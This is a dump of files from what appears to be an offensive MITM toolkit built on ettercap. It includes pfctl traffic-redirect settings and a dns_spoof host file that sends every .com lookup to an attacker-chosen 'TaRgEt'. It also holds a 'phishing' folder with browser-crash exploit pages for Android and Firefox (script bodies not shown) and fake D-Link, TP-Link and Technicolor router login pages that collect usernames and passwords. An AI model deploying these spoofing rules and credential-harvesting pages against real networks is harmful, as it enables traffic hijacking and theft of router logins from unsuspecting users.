loaded by 219 | # `kldstat | grep pf.ko`. If the rusult is empty, you can load it by 220 | # `kldload pf.ko` or add 'pf_enable="YES"' to the /etc/rc.conf and reboot. 221 | 222 | # Check if the PF status is enabled by 223 | # `pfctl -si | grep Status | awk '{print $2;}'`. If "Disabled", enable it with 224 | # `pfctl -e`. 225 | 226 | #redir_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet proto tcp from any to any port %port -> localhost port %rport') | pfctl -f - 2> /dev/null" 227 | #redir_command_off = "pfctl -Psn 2> /dev/null | grep -v %port | pfctl -f - 2> /dev/null" 228 | 229 | 230 | #--------------- 231 | # Open BSD 232 | #--------------- 233 | 234 | # unfortunately the pfctl command does not accepts direct rules adding 235 | # you have to use a script which executed the following command: 236 | 237 | # ----- cut here ------- 238 | # #!/bin/sh 239 | # rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f - 240 | # ----- cut here ------- 241 | 242 | # it's important to remember that you need "rdr-anchor sslsniff" in your 243 | # pf.conf in the TRANSLATION section. 244 | 245 | #redir_command_on = "the_script_described_above %iface %port %rport" 246 | #redir_command_off = "pfctl -a sslsniff -Fn" 247 | 248 | # also, if you create a group called "pfusers" and have EC_GID be that group, 249 | # you can do something like: 250 | # chgrp pfusers /dev/pf 251 | # chmod g+rw /dev/pf 252 | # such that all users in "pfusers" can run pfctl commands; thus allowing non-root 253 | # execution of redir commands. 
254 | 255 | 256 | ########## 257 | # EOF # 258 | ########## 259 | -------------------------------------------------------------------------------- /bin/etter.dns: -------------------------------------------------------------------------------- 1 | ############################################################################ 2 | # # 3 | # ettercap -- etter.dns -- host file for dns_spoof plugin # 4 | # # 5 | # Copyright (C) ALoR & NaGA # 6 | # # 7 | # This program is free software; you can redistribute it and/or modify # 8 | # it under the terms of the GNU General Public License as published by # 9 | # the Free Software Foundation; either version 2 of the License, or # 10 | # (at your option) any later version. # 11 | # # 12 | ############################################################################ 13 | 14 | 15 | 16 | 17 | 18 | ########################################### 19 | # morpheus domain name redirections # 20 | ########################################### 21 | 22 | .com A TaRgEt 23 | *.com A TaRgEt 24 | .com PTR TaRgEt # Wildcards in PTR are not allowed 25 | 26 | .PrE A TaRgEt 27 | *.PrE A TaRgEt 28 | .PrE PTR TaRgEt # Wildcards in PTR are not allowed 29 | 30 | 31 | 32 | ########################################## 33 | # no one out there can have our domains... 34 | # 35 | 36 | www.alor.org A 127.0.0.1 37 | www.naga.org A 127.0.0.1 38 | 39 | ############################################### 40 | # one day we will have our ettercap.org domain 41 | # 42 | 43 | www.ettercap.org A 127.0.0.1 44 | ettercap.sourceforge.net A 216.136.171.201 45 | 46 | ############################################### 47 | # some MX examples 48 | # 49 | 50 | alor.org MX 127.0.0.1 51 | naga.org MX 127.0.0.1 52 | 53 | ############################################### 54 | # This messes up NetBIOS clients using DNS 55 | # resolutions. I.e. Windows/Samba file sharing. 
56 | # 57 | 58 | LAB-PC* WINS 127.0.0.1 59 | 60 | # vim:ts=8:noexpandtab 61 | -------------------------------------------------------------------------------- /bin/phishing/Android-DOS-4.0.3.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Android 4.0.3 - Browser Remote Crash Exploit (HeapSpray) 4 | 5 | 10 | 11 | 12 | 13 | 14 | 24 | 25 | -------------------------------------------------------------------------------- /bin/phishing/EasterEgg.html: -------------------------------------------------------------------------------- 1 | - OWNED - 2 | -------------------------------------------------------------------------------- /bin/phishing/Firefox-D0S-49.0.1.html: -------------------------------------------------------------------------------- 1 | 2 | Firefox 49.0.1 - Browser Remote Crash Exploit (Heap-Spray) 3 | 4 | 11 | 12 | 27 | 28 | -------------------------------------------------------------------------------- /bin/phishing/Google_prank_180/googlelogo_color_272x92dp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/Google_prank_180/googlelogo_color_272x92dp.png -------------------------------------------------------------------------------- /bin/phishing/miss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/miss.png -------------------------------------------------------------------------------- /bin/phishing/router-modem/DLINK/img_wireless_bottom.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/DLINK/img_wireless_bottom.gif 
-------------------------------------------------------------------------------- /bin/phishing/router-modem/DLINK/logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/DLINK/logo.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/DLINK/md5.js: -------------------------------------------------------------------------------- 1 | /* 2 | * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message 3 | * Digest Algorithm, as defined in RFC 1321. 4 | * Version 2.1 Copyright (C) Paul Johnston 1999 - 2002. 5 | * Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet 6 | * Distributed under the BSD License 7 | * See http://pajhome.org.uk/crypt/md5 for more info. 8 | */ 9 | 10 | /* 11 | * Configurable variables. You may need to tweak these to be compatible with 12 | * the server-side, but the defaults work in most cases. 13 | */ 14 | var hexcase = 0; /* hex output format. 0 - lowercase; 1 - uppercase */ 15 | var b64pad = ""; /* base-64 pad character. "=" for strict RFC compliance */ 16 | var chrsz = 8; /* bits per input character. 
8 - ASCII; 16 - Unicode */ 17 | 18 | /* 19 | * These are the functions you'll usually want to call 20 | * They take string arguments and return either hex or base-64 encoded strings 21 | */ 22 | function hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));} 23 | function b64_md5(s){ return binl2b64(core_md5(str2binl(s), s.length * chrsz));} 24 | function str_md5(s){ return binl2str(core_md5(str2binl(s), s.length * chrsz));} 25 | function hex_hmac_md5(key, data) { return binl2hex(core_hmac_md5(key, data)); } 26 | function b64_hmac_md5(key, data) { return binl2b64(core_hmac_md5(key, data)); } 27 | function str_hmac_md5(key, data) { return binl2str(core_hmac_md5(key, data)); } 28 | 29 | /* 30 | * Perform a simple self-test to see if the VM is working 31 | */ 32 | function md5_vm_test() 33 | { 34 | return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72"; 35 | } 36 | 37 | /* 38 | * Calculate the MD5 of an array of little-endian words, and a bit length 39 | */ 40 | function core_md5(x, len) 41 | { 42 | /* append padding */ 43 | x[len >> 5] |= 0x80 << ((len) % 32); 44 | x[(((len + 64) >>> 9) << 4) + 14] = len; 45 | 46 | var a = 1732584193; 47 | var b = -271733879; 48 | var c = -1732584194; 49 | var d = 271733878; 50 | 51 | for(var i = 0; i < x.length; i += 16) 52 | { 53 | var olda = a; 54 | var oldb = b; 55 | var oldc = c; 56 | var oldd = d; 57 | 58 | a = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936); 59 | d = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586); 60 | c = md5_ff(c, d, a, b, x[i+ 2], 17, 606105819); 61 | b = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330); 62 | a = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897); 63 | d = md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426); 64 | c = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341); 65 | b = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983); 66 | a = md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416); 67 | d = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417); 68 | c = md5_ff(c, d, a, b, x[i+10], 17, -42063); 69 | b = md5_ff(b, c, d, 
a, x[i+11], 22, -1990404162); 70 | a = md5_ff(a, b, c, d, x[i+12], 7 , 1804603682); 71 | d = md5_ff(d, a, b, c, x[i+13], 12, -40341101); 72 | c = md5_ff(c, d, a, b, x[i+14], 17, -1502002290); 73 | b = md5_ff(b, c, d, a, x[i+15], 22, 1236535329); 74 | 75 | a = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510); 76 | d = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632); 77 | c = md5_gg(c, d, a, b, x[i+11], 14, 643717713); 78 | b = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302); 79 | a = md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691); 80 | d = md5_gg(d, a, b, c, x[i+10], 9 , 38016083); 81 | c = md5_gg(c, d, a, b, x[i+15], 14, -660478335); 82 | b = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848); 83 | a = md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438); 84 | d = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690); 85 | c = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961); 86 | b = md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501); 87 | a = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467); 88 | d = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784); 89 | c = md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473); 90 | b = md5_gg(b, c, d, a, x[i+12], 20, -1926607734); 91 | 92 | a = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558); 93 | d = md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463); 94 | c = md5_hh(c, d, a, b, x[i+11], 16, 1839030562); 95 | b = md5_hh(b, c, d, a, x[i+14], 23, -35309556); 96 | a = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060); 97 | d = md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353); 98 | c = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632); 99 | b = md5_hh(b, c, d, a, x[i+10], 23, -1094730640); 100 | a = md5_hh(a, b, c, d, x[i+13], 4 , 681279174); 101 | d = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222); 102 | c = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979); 103 | b = md5_hh(b, c, d, a, x[i+ 6], 23, 76029189); 104 | a = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487); 105 | d = md5_hh(d, a, b, c, x[i+12], 11, -421815835); 106 | c = md5_hh(c, d, a, b, x[i+15], 16, 530742520); 107 | b = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651); 108 | 109 | a 
= md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844); 110 | d = md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415); 111 | c = md5_ii(c, d, a, b, x[i+14], 15, -1416354905); 112 | b = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055); 113 | a = md5_ii(a, b, c, d, x[i+12], 6 , 1700485571); 114 | d = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606); 115 | c = md5_ii(c, d, a, b, x[i+10], 15, -1051523); 116 | b = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799); 117 | a = md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359); 118 | d = md5_ii(d, a, b, c, x[i+15], 10, -30611744); 119 | c = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380); 120 | b = md5_ii(b, c, d, a, x[i+13], 21, 1309151649); 121 | a = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070); 122 | d = md5_ii(d, a, b, c, x[i+11], 10, -1120210379); 123 | c = md5_ii(c, d, a, b, x[i+ 2], 15, 718787259); 124 | b = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551); 125 | 126 | a = safe_add(a, olda); 127 | b = safe_add(b, oldb); 128 | c = safe_add(c, oldc); 129 | d = safe_add(d, oldd); 130 | } 131 | return Array(a, b, c, d); 132 | 133 | } 134 | 135 | /* 136 | * These functions implement the four basic operations the algorithm uses. 
137 | */ 138 | function md5_cmn(q, a, b, x, s, t) 139 | { 140 | return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s),b); 141 | } 142 | function md5_ff(a, b, c, d, x, s, t) 143 | { 144 | return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t); 145 | } 146 | function md5_gg(a, b, c, d, x, s, t) 147 | { 148 | return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t); 149 | } 150 | function md5_hh(a, b, c, d, x, s, t) 151 | { 152 | return md5_cmn(b ^ c ^ d, a, b, x, s, t); 153 | } 154 | function md5_ii(a, b, c, d, x, s, t) 155 | { 156 | return md5_cmn(c ^ (b | (~d)), a, b, x, s, t); 157 | } 158 | 159 | /* 160 | * Calculate the HMAC-MD5, of a key and some data 161 | */ 162 | function core_hmac_md5(key, data) 163 | { 164 | var bkey = str2binl(key); 165 | if(bkey.length > 16) bkey = core_md5(bkey, key.length * chrsz); 166 | 167 | var ipad = Array(16), opad = Array(16); 168 | for(var i = 0; i < 16; i++) 169 | { 170 | ipad[i] = bkey[i] ^ 0x36363636; 171 | opad[i] = bkey[i] ^ 0x5C5C5C5C; 172 | } 173 | 174 | var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz); 175 | return core_md5(opad.concat(hash), 512 + 128); 176 | } 177 | 178 | /* 179 | * Add integers, wrapping at 2^32. This uses 16-bit operations internally 180 | * to work around bugs in some JS interpreters. 181 | */ 182 | function safe_add(x, y) 183 | { 184 | var lsw = (x & 0xFFFF) + (y & 0xFFFF); 185 | var msw = (x >> 16) + (y >> 16) + (lsw >> 16); 186 | return (msw << 16) | (lsw & 0xFFFF); 187 | } 188 | 189 | /* 190 | * Bitwise rotate a 32-bit number to the left. 191 | */ 192 | function bit_rol(num, cnt) 193 | { 194 | return (num << cnt) | (num >>> (32 - cnt)); 195 | } 196 | 197 | /* 198 | * Convert a string to an array of little-endian words 199 | * If chrsz is ASCII, characters >255 have their hi-byte silently ignored. 
200 | */ 201 | function str2binl(str) 202 | { 203 | var bin = Array(); 204 | var mask = (1 << chrsz) - 1; 205 | for(var i = 0; i < str.length * chrsz; i += chrsz) 206 | bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (i%32); 207 | return bin; 208 | } 209 | 210 | /* 211 | * Convert an array of little-endian words to a string 212 | */ 213 | function binl2str(bin) 214 | { 215 | var str = ""; 216 | var mask = (1 << chrsz) - 1; 217 | for(var i = 0; i < bin.length * 32; i += chrsz) 218 | str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask); 219 | return str; 220 | } 221 | 222 | /* 223 | * Convert an array of little-endian words to a hex string. 224 | */ 225 | function binl2hex(binarray) 226 | { 227 | var hex_tab = hexcase ? "0123456789ABCDEF" : "0123456789abcdef"; 228 | var str = ""; 229 | for(var i = 0; i < binarray.length * 4; i++) 230 | { 231 | str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) + 232 | hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF); 233 | } 234 | return str; 235 | } 236 | 237 | /* 238 | * Convert an array of little-endian words to a base-64 string 239 | */ 240 | function binl2b64(binarray) 241 | { 242 | var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 243 | var str = ""; 244 | for(var i = 0; i < binarray.length * 4; i += 3) 245 | { 246 | var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16) 247 | | (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 ) 248 | | ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF); 249 | for(var j = 0; j < 4; j++) 250 | { 251 | if(i * 8 + j * 6 > binarray.length * 32) str += b64pad; 252 | else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F); 253 | } 254 | } 255 | return str; 256 | } 257 | 258 | function md5_js_loaded() { return true; } 259 | -------------------------------------------------------------------------------- /bin/phishing/router-modem/DLINK/substyle_DIR-615.css: -------------------------------------------------------------------------------- 1 | /* 
CSS substyle for variations applicable to specific products */ 2 | 3 | #modnum_image { 4 | width: 125px; 5 | height: 25px; 6 | background-image: url(short_modnum_DIR-615.gif); 7 | } -------------------------------------------------------------------------------- /bin/phishing/router-modem/TPLink/encrypt.js.download: -------------------------------------------------------------------------------- 1 | function hex_md5(s) 2 | { 3 | return binl2hex(core_md5(str2binl(s), s.length * 8)); 4 | } 5 | 6 | function core_md5(x, len) 7 | { 8 | /* append padding */ 9 | x[len >> 5] |= 0x80 << ((len) % 32); 10 | x[(((len + 64) >>> 9) << 4) + 14] = len; 11 | 12 | var a = 1732584193; 13 | var b = -271733879; 14 | var c = -1732584194; 15 | var d = 271733878; 16 | 17 | for(var i = 0; i < x.length; i += 16) 18 | { 19 | var olda = a; 20 | var oldb = b; 21 | var oldc = c; 22 | var oldd = d; 23 | 24 | a = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936); 25 | d = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586); 26 | c = md5_ff(c, d, a, b, x[i+ 2], 17, 606105819); 27 | b = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330); 28 | a = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897); 29 | d = md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426); 30 | c = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341); 31 | b = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983); 32 | a = md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416); 33 | d = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417); 34 | c = md5_ff(c, d, a, b, x[i+10], 17, -42063); 35 | b = md5_ff(b, c, d, a, x[i+11], 22, -1990404162); 36 | a = md5_ff(a, b, c, d, x[i+12], 7 , 1804603682); 37 | d = md5_ff(d, a, b, c, x[i+13], 12, -40341101); 38 | c = md5_ff(c, d, a, b, x[i+14], 17, -1502002290); 39 | b = md5_ff(b, c, d, a, x[i+15], 22, 1236535329); 40 | 41 | a = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510); 42 | d = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632); 43 | c = md5_gg(c, d, a, b, x[i+11], 14, 643717713); 44 | b = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302); 45 | a = md5_gg(a, b, c, d, 
x[i+ 5], 5 , -701558691); 46 | d = md5_gg(d, a, b, c, x[i+10], 9 , 38016083); 47 | c = md5_gg(c, d, a, b, x[i+15], 14, -660478335); 48 | b = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848); 49 | a = md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438); 50 | d = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690); 51 | c = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961); 52 | b = md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501); 53 | a = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467); 54 | d = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784); 55 | c = md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473); 56 | b = md5_gg(b, c, d, a, x[i+12], 20, -1926607734); 57 | 58 | a = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558); 59 | d = md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463); 60 | c = md5_hh(c, d, a, b, x[i+11], 16, 1839030562); 61 | b = md5_hh(b, c, d, a, x[i+14], 23, -35309556); 62 | a = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060); 63 | d = md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353); 64 | c = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632); 65 | b = md5_hh(b, c, d, a, x[i+10], 23, -1094730640); 66 | a = md5_hh(a, b, c, d, x[i+13], 4 , 681279174); 67 | d = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222); 68 | c = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979); 69 | b = md5_hh(b, c, d, a, x[i+ 6], 23, 76029189); 70 | a = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487); 71 | d = md5_hh(d, a, b, c, x[i+12], 11, -421815835); 72 | c = md5_hh(c, d, a, b, x[i+15], 16, 530742520); 73 | b = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651); 74 | 75 | a = md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844); 76 | d = md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415); 77 | c = md5_ii(c, d, a, b, x[i+14], 15, -1416354905); 78 | b = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055); 79 | a = md5_ii(a, b, c, d, x[i+12], 6 , 1700485571); 80 | d = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606); 81 | c = md5_ii(c, d, a, b, x[i+10], 15, -1051523); 82 | b = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799); 83 | a = md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359); 84 | d = md5_ii(d, a, b, 
c, x[i+15], 10, -30611744); 85 | c = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380); 86 | b = md5_ii(b, c, d, a, x[i+13], 21, 1309151649); 87 | a = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070); 88 | d = md5_ii(d, a, b, c, x[i+11], 10, -1120210379); 89 | c = md5_ii(c, d, a, b, x[i+ 2], 15, 718787259); 90 | b = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551); 91 | 92 | a = safe_add(a, olda); 93 | b = safe_add(b, oldb); 94 | c = safe_add(c, oldc); 95 | d = safe_add(d, oldd); 96 | } 97 | return Array(a, b, c, d); 98 | 99 | } 100 | 101 | function md5_cmn(q, a, b, x, s, t) 102 | { 103 | return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s),b); 104 | } 105 | function md5_ff(a, b, c, d, x, s, t) 106 | { 107 | return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t); 108 | } 109 | function md5_gg(a, b, c, d, x, s, t) 110 | { 111 | return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t); 112 | } 113 | function md5_hh(a, b, c, d, x, s, t) 114 | { 115 | return md5_cmn(b ^ c ^ d, a, b, x, s, t); 116 | } 117 | function md5_ii(a, b, c, d, x, s, t) 118 | { 119 | return md5_cmn(c ^ (b | (~d)), a, b, x, s, t); 120 | } 121 | 122 | /* 123 | * Add integers, wrapping at 2^32. This uses 16-bit operations internally 124 | * to work around bugs in some JS interpreters. 
125 | */ 126 | function safe_add(x, y) 127 | { 128 | var lsw = (x & 0xFFFF) + (y & 0xFFFF); 129 | var msw = (x >> 16) + (y >> 16) + (lsw >> 16); 130 | return (msw << 16) | (lsw & 0xFFFF); 131 | } 132 | 133 | function bit_rol(num, cnt) 134 | { 135 | return (num << cnt) | (num >>> (32 - cnt)); 136 | } 137 | 138 | function str2binl(str) 139 | { 140 | var bin = Array(); 141 | var mask = (1 << 8) - 1; 142 | for(var i = 0; i < str.length * 8; i += 8) 143 | bin[i>>5] |= (str.charCodeAt(i / 8) & mask) << (i%32); 144 | return bin; 145 | } 146 | 147 | function binl2hex(binarray) 148 | { 149 | var hex_tab = "0123456789abcdef"; 150 | var str = ""; 151 | for(var i = 0; i < binarray.length * 4; i++) 152 | { 153 | str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) + 154 | hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF); 155 | } 156 | return str; 157 | } 158 | 159 | function Base64Encoding(input) 160 | { 161 | var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; 162 | var output = ""; 163 | var chr1, chr2, chr3, enc1, enc2, enc3, enc4; 164 | var i = 0; 165 | 166 | //input = utf8_encode(input); 167 | 168 | while (i < input.length) 169 | { 170 | 171 | chr1 = input.charCodeAt(i++); 172 | chr2 = input.charCodeAt(i++); 173 | chr3 = input.charCodeAt(i++); 174 | 175 | enc1 = chr1 >> 2; 176 | enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); 177 | enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); 178 | enc4 = chr3 & 63; 179 | 180 | if (isNaN(chr2)) { 181 | enc3 = enc4 = 64; 182 | } else if (isNaN(chr3)) { 183 | enc4 = 64; 184 | } 185 | 186 | output = output + 187 | keyStr.charAt(enc1) + keyStr.charAt(enc2) + 188 | keyStr.charAt(enc3) + keyStr.charAt(enc4); 189 | 190 | } 191 | 192 | return output; 193 | } 194 | 195 | function utf8_encode (string) 196 | { 197 | string = string.replace(/\r\n/g,"\n"); 198 | var utftext = ""; 199 | 200 | for (var n = 0; n < string.length; n++) { 201 | 202 | var c = string.charCodeAt(n); 203 | 204 | if (c < 128) { 205 | utftext += 
String.fromCharCode(c); 206 | } 207 | else if((c > 127) && (c < 2048)) { 208 | utftext += String.fromCharCode((c >> 6) | 192); 209 | utftext += String.fromCharCode((c & 63) | 128); 210 | } 211 | else { 212 | utftext += String.fromCharCode((c >> 12) | 224); 213 | utftext += String.fromCharCode(((c >> 6) & 63) | 128); 214 | utftext += String.fromCharCode((c & 63) | 128); 215 | } 216 | 217 | } 218 | 219 | return utftext; 220 | } -------------------------------------------------------------------------------- /bin/phishing/router-modem/TPLink/index.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/TPLink/index.html -------------------------------------------------------------------------------- /bin/phishing/router-modem/TPLink/top1_1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/TPLink/top1_1.jpg -------------------------------------------------------------------------------- /bin/phishing/router-modem/TPLink/top1_2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/TPLink/top1_2.jpg -------------------------------------------------------------------------------- /bin/phishing/router-modem/TPLink/top2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/TPLink/top2.jpg -------------------------------------------------------------------------------- /bin/phishing/router-modem/Technicolor/index.html: 
--------------------------------------------------------------------------------
Technicolor Gateway - Login
Login
Enter your username and password to access the Technicolor Gateway
UserName:
Password:
402 | 403 | 404 | 405 | -------------------------------------------------------------------------------- /bin/phishing/router-modem/Technicolor/spacer.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/phishing/router-modem/Technicolor/spacer.gif -------------------------------------------------------------------------------- /bin/phishing/router-modem/Technicolor/styles.css: -------------------------------------------------------------------------------- 1 | body {color:#000000; TEXT-ALIGN:left; FONT-SIZE:0.7em; FONT-WEIGHT:normal; FONT-STYLE:normal; TEXT-DECORATION:none;} 2 | body, th, td, tr, div, span {FONT-FAMILY:Verdana, Arial, Helvetica, sans-serif;vertical-align:top;} 3 | h1 {color:/*gray01*/#333; FONT-SIZE:1.5em; FONT-WEIGHT:bold;} 4 | em {color:/*color01*/#0199cb;font-weight:bold; font-style:normal;} 5 | a img {border:none;} 6 | strong {color:/*color01*/#0199cb;} 7 | ul {list-style-type:square;margin:0px;padding-left:16px;} 8 | .tableIcon {margin-right:4px;} 9 | 10 | .main {margin-left:auto;margin-right:auto;border-color:/*gray03*/#ADADAD;border-width:0px 1px 1px 1px;border-style:solid;} 11 | .page {padding:0px 15px 0px 15px;min-height:300px;} 12 | .pagebottom{background-color:transparent;height:10px;} 13 | 14 | .banner {font:normal 10pt verdana;} 15 | .banner td {padding:14px 10px 14px 10px;border-right:1px;} 16 | .nopadtable td{padding: 0px;} 17 | 18 | .product {color:/*gray04*/#666;font:bold 12pt verdana;text-align:left;margin:0px;} 19 | 20 | .displaySettings {color:/*gray04*/#666;margin:0px;} 21 | .displaySettings a, .displaySettings a:visited {font-weight:normal;color:/*gray04*/#666;} 22 | 23 | .login {text-align:center;} 24 | .login a, .login a:visited {font-weight:normal;color:black;} 25 | 26 | .logo {text-align:right;} 27 | 28 | .langSelect a:hover,.login a:hover,.displaySettings a:hover 
{color:/*color01*/#0199cb;} 29 | .langSelect form {display:inline;} 30 | 31 | .Menu {background-color:/*gray03*/#ADADAD;vertical-align:top;border-right:1px solid /*gray03*/#ADADAD} 32 | .MenuVBar {background-color:#FFFFFF; text-decoration:none;} 33 | 34 | .Menu1Item, .Menu1ItemOver {font-size:1.2em;padding:8px 12px 8px 12px; text-align:right;} 35 | .Menu1ItemOver {background-color:/*color01*/#0199cb;color:white;} 36 | .Menu1Item a { color:/*gray01*/#333; text-decoration:none; font-weight:bold;} 37 | .Menu1ItemOver a {color:black; text-decoration:none;font-weight:bold;color:white;} 38 | .Menu1Item a:hover, .Menu1ItemOver a:hover {font-weight:bold; text-decoration:underline;} 39 | 40 | .Menu2Item, .Menu2ItemOver {font-size:1em;padding:6px 12px 6px 12px;background-color:white; text-align:right;} 41 | .Menu2Item a {color:black; text-decoration:none;} 42 | .Menu2ItemOver a {color:black;font-weight:bold;text-decoration:none;} 43 | .Menu2Item a:hover, .Menu2ItemOver a:hover {color:/*color01*/#0199cb;text-decoration:underline;} 44 | 45 | .PageMessage {font-size:1em; font-weight:normal;border:1px solid /*gray05*/#CACACA;margin:-10px 0px 0px 0px;} 46 | .PageMessage td {padding:2px} 47 | .PageMessage img {margin-top:1px} 48 | 49 | .Table_Title {font-size:1em; color:white; background-color:/*gray04*/#666; FONT-WEIGHT:bold;} 50 | .Table_InfoBar {font-size:1em; background-color:transparent;padding-top:4px;} 51 | .Table_InfoBarWarning {font-size:1em; color:red; background-color:transparent;padding-bottom:6px;} 